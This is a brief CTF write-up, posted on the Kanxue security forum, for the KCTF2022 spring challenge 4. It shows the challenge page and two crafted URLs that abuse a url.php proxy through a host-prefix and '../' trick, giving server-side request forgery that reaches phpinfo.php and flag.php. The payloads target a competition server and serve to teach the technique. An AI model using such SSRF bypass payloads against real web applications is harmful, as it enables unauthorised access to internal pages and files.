[原创]KCTF2022春第四题飞蛾扑火 writeup-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创]KCTF2022春第四题飞蛾扑火 writeup

发表于: 2022-5-15 17:08 3106

[原创]KCTF2022春第四题飞蛾扑火 writeup

Wblank

2022-5-15 17:08

3106

访问 http://101.89.140.207:8044/

<html>
<head>
<meta charset="utf-8">
<title>欢迎挑战 Design by 香草</title>
</head>
<body>
<!--phpinfo.php-->
<img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png">
</body>
</html>

先把url.php重定向过了,做到ssrf

1	`http://101.89.140.207:8044/url.php?url=127.0.0.1://ctf.pediy.com/../phpinfo.php`

图片描述
看到curl下支持的协议存在file

http://101.89.140.207:8044/url.php?url=123.57.254.42://localhost/../flag.php
图片描述

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

收藏・0

免费・0

支持

最新回复 (0)
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Wblank

发帖

回帖

383

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

[原创]KCTF2022春 第四题 飞蛾扑火 writeup

[原创]KCTF2022春第四题飞蛾扑火 writeup